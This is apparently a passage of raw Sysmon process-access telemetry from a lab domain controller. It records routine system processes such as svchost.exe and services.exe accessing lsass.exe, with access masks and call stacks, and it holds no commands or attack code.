AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.219{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.219{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.219{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.219{10ACEC4A-853E-5FCF-0A00-000000009101}8522924C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.217{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.216{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.216{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.211{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 